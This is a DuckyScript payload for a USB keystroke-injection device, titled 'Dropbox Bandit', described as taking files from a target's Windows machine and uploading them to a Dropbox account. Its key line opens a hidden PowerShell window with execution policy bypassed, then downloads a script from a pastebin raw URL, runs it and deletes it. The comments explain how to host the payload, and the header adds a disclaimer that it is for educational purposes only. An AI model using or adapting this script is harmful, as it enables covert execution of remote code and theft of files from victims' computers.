1
REM Title: Dropbox Bandit
2
REM Author: Factor (github.com/Factor101)
3
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
4
REM Target: Windows 10/11 (Powershell)
5
REM Version: 1.0
6
REM Category: Exfiltration
7
REM Legal: This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.
8

9
ATTACKMODE HID
10
REM Inital Delay
11
DELAY 500
12

13
REM Open CMD
14
GUI r
15
REM Delay to allow window to open
16
DELAY 100
17
REM Launch hidden powershell window to execute our script
18

19
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
20
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
21
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
22
REM                                                                         --------- replace me! ----------
23
STRINGLN powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
24
DELAY 200
25

26
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
27
CAPSLOCK
28
ATTACKMODE OFF
29